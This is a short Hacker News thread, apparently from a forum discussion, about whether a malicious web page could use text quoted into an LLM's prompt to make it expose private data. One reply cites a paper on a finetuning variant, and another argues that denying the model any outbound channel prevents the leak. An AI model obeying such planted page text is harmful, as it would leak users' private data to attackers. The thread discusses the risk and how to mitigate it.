logoalt Hacker News

nazgul17last Wednesday at 12:41 PM2 repliesview on HN

Thinking aloud, but couldn't someone create a website with some malicious text that, when quoted in a prompt, convinces the LLM to expose certain private data to the web page, and couldn't the webpage send that data to a third party, without the need for the LLM to do so?

This is probably possible to mitigate, but I fear what people more creative, motivated and technically adept could come up with.


Replies

FeepingCreaturelast Wednesday at 4:56 PM

At least with finetuning, yes: https://arxiv.org/abs/2512.09742

It's unclear if this technique could also work with in-prompt data.

yunohnlast Wednesday at 9:46 PM

Why does the LLM get to send data to the website?? That’s my whole point, if you don’t expose a way for it to send data anywhere, it can’t.